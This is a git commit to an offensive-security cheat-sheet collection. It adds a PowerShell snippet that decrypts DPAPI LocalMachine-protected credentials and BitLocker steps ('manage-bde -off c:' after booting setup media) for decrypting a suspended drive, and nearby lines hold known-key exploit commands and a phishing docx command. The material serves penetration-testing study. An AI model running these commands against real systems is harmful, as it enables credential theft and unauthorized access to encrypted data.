DPAPI LocalMachine + BitLocker

This commit is contained in:
Swissky 2023-05-08 17:08:25 +02:00
parent 0dd92aa89d
commit 5af6a23a2e
5 changed files with 28 additions and 4 deletions

View File

@ -45,7 +45,7 @@
python ./badsecrets/examples/telerik_knownkey.py --url http://vulnerablesite/Telerik.Web.UI.DialogHandler.aspx python ./badsecrets/examples/telerik_knownkey.py --url http://vulnerablesite/Telerik.Web.UI.DialogHandler.aspx
python ./badsecrets/examples/symfony_knownkey.py --url https://localhost/ python ./badsecrets/examples/symfony_knownkey.py --url https://localhost/
``` ```
- [mazen160/secrets-patterns-db](https://github.com/mazen160/secrets-patterns-db) - Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more.
## Exploit ## Exploit

View File

@ -60,7 +60,7 @@
- [Pass-the-Ticket Sapphire Tickets](#pass-the-ticket-sapphire-tickets) - [Pass-the-Ticket Sapphire Tickets](#pass-the-ticket-sapphire-tickets)
- [Kerberoasting](#kerberoasting) - [Kerberoasting](#kerberoasting)
- [KRB_AS_REP Roasting](#krb_as_rep-roasting) - [KRB_AS_REP Roasting](#krb_as_rep-roasting)
- [CVE-2022-33679 (RC4 Is Still Considered Harmful)](#cve-2022-33679-rc4-is-still-considered-harmful) - [CVE-2022-33679](#cve-2022-33679)
- [Timeroasting](#timeroasting) - [Timeroasting](#timeroasting)
- [Pass-the-Hash](#pass-the-hash) - [Pass-the-Hash](#pass-the-hash)
- [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
@ -1982,7 +1982,7 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa
## CVE-2022-33679 (RC4 Is Still Considered Harmful) ## CVE-2022-33679
> CVE-2022-33679 performs an encryption downgrade attack by forcing the KDC to use the RC4-MD4 algorithm and then brute forcing the session key from the AS-REP using a known plaintext attack, Similar to AS-REP Roasting, it works against accounts that have pre-authentication disabled and the attack is unauthenticated meaning we dont need a clients password.. > CVE-2022-33679 performs an encryption downgrade attack by forcing the KDC to use the RC4-MD4 algorithm and then brute forcing the session key from the AS-REP using a known plaintext attack, Similar to AS-REP Roasting, it works against accounts that have pre-authentication disabled and the attack is unauthenticated meaning we dont need a clients password..

View File

@ -743,4 +743,5 @@ $ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
* [Executing macros from docx with remote - RedXORBlueJuly 18, 2018](http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html) * [Executing macros from docx with remote - RedXORBlueJuly 18, 2018](http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html)
* [One thousand and one ways to copy your shellcode to memory (VBA Macros) - X-C3LL - Feb 18, 2021](https://adepts.of0x.cc/alternatives-copy-shellcode/) * [One thousand and one ways to copy your shellcode to memory (VBA Macros) - X-C3LL - Feb 18, 2021](https://adepts.of0x.cc/alternatives-copy-shellcode/)
* [Running macros via ActiveX controls - greyhathacker - September 29, 2016](http://www.greyhathacker.net/?p=948) * [Running macros via ActiveX controls - greyhathacker - September 29, 2016](http://www.greyhathacker.net/?p=948)
* [Anti-Analysis Techniques Used in Excel 4.0 Macros - 24 March 2021 - @Jacob_Pimental](https://www.goggleheadedhacker.com/blog/post/23) * [Anti-Analysis Techniques Used in Excel 4.0 Macros - 24 March 2021 - @Jacob_Pimental](https://www.goggleheadedhacker.com/blog/post/23)
* [So you think you can block Macros? - Pieter Ceelen - April 25, 2023](https://outflank.nl/blog/2023/04/25/so-you-think-you-can-block-macros/)

View File

@ -6,6 +6,7 @@
* [Data Protection API](#data-protection-api) * [Data Protection API](#data-protection-api)
* [List Credential Files](#list-credential-files) * [List Credential Files](#list-credential-files)
* [DPAPI LocalMachine Context](#dpapi-localmachine-context)
* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi) * [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi)
* [Hekatomb - Steal all credentials on domain](#hekatomb---steal-all-credentials-on-domain) * [Hekatomb - Steal all credentials on domain](#hekatomb---steal-all-credentials-on-domain)
* [DonPAPI - Dumping DPAPI credz remotely](#donpapi---dumping-dpapi-credz-remotely) * [DonPAPI - Dumping DPAPI credz remotely](#donpapi---dumping-dpapi-credz-remotely)
@ -37,6 +38,19 @@ Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
``` ```
### DPAPI LocalMachine Context
The `LocalMachine` context is used to protect data that is intended to be shared across different users or services on a single machine. This means that any user or service running on the machine can access the protected data with the appropriate credentials.
In contrast, the `CurrentUser` context is used to protect data that is intended to be accessed only by the user who encrypted it, and cannot be accessed by other users or services on the same machine.
```ps1
$a = [System.Convert]::FromBase64String("AQAAANCMnd[...]")
$b = [System.Security.Cryptography.ProtectedData]::Unprotect($a, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine)
[System.Text.Encoding]::ASCII.GetString($b)
```
### Mimikatz - Credential Manager & DPAPI ### Mimikatz - Credential Manager & DPAPI
```powershell ```powershell

View File

@ -365,6 +365,15 @@ The **Enterprise Context** column shows you what each app can do with your enter
* **Exempt**. Shows the text, Exempt. Windows Information Protection policies don't apply to these apps (such as, system components). * **Exempt**. Shows the text, Exempt. Windows Information Protection policies don't apply to these apps (such as, system components).
## BitLocker Drive Encryption
BitLocker is a full-disk encryption feature included in Microsoft Windows operating systems starting with Windows Vista. It is designed to protect data by providing encryption for entire volumes. BitLocker uses AES encryption algorithm to encrypt data on the disk. When enabled, BitLocker requires a user to enter a password or insert a USB flash drive to unlock the encrypted volume before the operating system is loaded, ensuring that data on the disk is protected from unauthorized access. BitLocker is commonly used on laptops, portable storage devices, and other mobile devices to protect sensitive data in case of theft or loss.
When BitLocker is in `Suspended` state, boot the system using a Windows Setup USB, and then decrypt the drive using this command: `manage-bde -off c:`
You can check if it is done decrypting using this command: `manage-bde -status`
## References ## References
* [SNEAKING PAST DEVICE GUARD - Cybereason - Philip Tsukerman](https://troopers.de/downloads/troopers19/TROOPERS19_AR_Sneaking_Past_Device_Guard.pdf) * [SNEAKING PAST DEVICE GUARD - Cybereason - Philip Tsukerman](https://troopers.de/downloads/troopers19/TROOPERS19_AR_Sneaking_Past_Device_Guard.pdf)